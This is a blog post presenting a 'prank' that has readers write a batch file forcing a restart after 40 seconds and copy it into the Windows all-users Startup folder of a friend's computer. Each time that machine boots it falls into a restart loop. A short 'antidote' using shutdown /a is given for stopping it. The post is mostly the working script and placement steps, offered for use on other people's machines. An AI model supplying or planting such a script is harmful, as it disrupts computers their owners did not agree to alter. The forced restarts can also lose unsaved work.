Search This Blog

Pages

Header Ads Widget

Responsive Advertisement
Showing posts with label tricks. Show all posts
Showing posts with label tricks. Show all posts

Friday, 18 August 2017

Prank on friends: Restart their computer continously......

Hello guys
This trick will help to prank on your friends...
Simply paste this coding in notepad and save this as *.bat (ex: shut.bat).
...................................................................................................
@echo     off
echo message here
shutdown /r /t 40 /c "HAVE FUN"
....................................................................................................

 And the last step paste this file in following directory:-
"C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup"


Now your freinds computer will restart every time in span of  40 seconds.

ANTIDOTE:
Simply save this line in notepad as antidote.bat
..........................................
shutdown /a
..........................................
Then after restart, fastly click this file to abort one time restart
And then delete this file from startup folder or given directory
"C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup"

WARNING:
Antidote file should be placed on desktop for quick action.
Try this trick at your own responsibility, this blog is not liable for any action caused by this trick.
For any help mail us or leave comment.

Like and Share if u enjoy it.....😎😎